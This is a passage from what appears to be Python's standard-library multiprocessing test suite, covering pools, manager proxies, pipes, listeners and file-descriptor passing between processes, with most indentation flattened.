# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
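    # Class-level instance counter, used by test_release_task_refs to check
    # that task arguments and results are released by the pool.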
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
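    # Yield 0 .. total-1, but raise SayWhenError once the index reaches
    # `when`; when == -1 raises before anything is yielded.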
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
        # test cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
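# Proxy type that forwards iteration to the generator living in the manager
# process.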
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
        # Because we are using xmlrpclib for serialization instead of
        # pickle, this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
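        # Return True if fd refers to an open file descriptor (os.fstat
        # succeeds), False if it is unassigned (EBADF).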
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
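        # Receive a file descriptor (or Windows handle) over the connection
        # and write `data` to it; with create_dummy_fds the unassigned
        # descriptors below 256 are filled first so the received fd lands
        # above 255 (used by test_large_fd_transfer).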
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written its data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
